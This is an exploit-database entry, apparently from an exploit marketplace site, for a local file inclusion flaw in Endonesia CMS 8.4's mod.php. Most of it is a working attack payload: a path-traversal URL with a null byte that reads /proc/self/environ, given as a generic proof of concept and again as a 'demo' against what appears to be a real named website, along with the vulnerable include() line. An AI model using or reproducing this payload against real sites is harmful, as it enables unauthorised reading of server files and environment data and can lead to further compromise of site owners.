[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Endonesia CMS 8.4 local file inclusion

Author
s4r4d0
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9968
Category
web applications
Date add
04-10-2009
Platform
unsorted
======================================
Endonesia CMS 8.4 local file inclusion
======================================

[*] Endonesia 8.4 CMS
[*] Site: http://www.endonesia.org/
[*] Download: http://sourceforge.net/projects/endonesia
[*] Bug: Local File Inclusion in mod.php file !
[*] Team: Fatal Error
[*] Poc:http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] DEMO:http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] SecurityReason Note :
#
# Vulnerable Code in mod.php :
#
# include("./mod/$mod/index.php");
#
# magic_quotes = Off



#  0day.today [2024-12-25]  #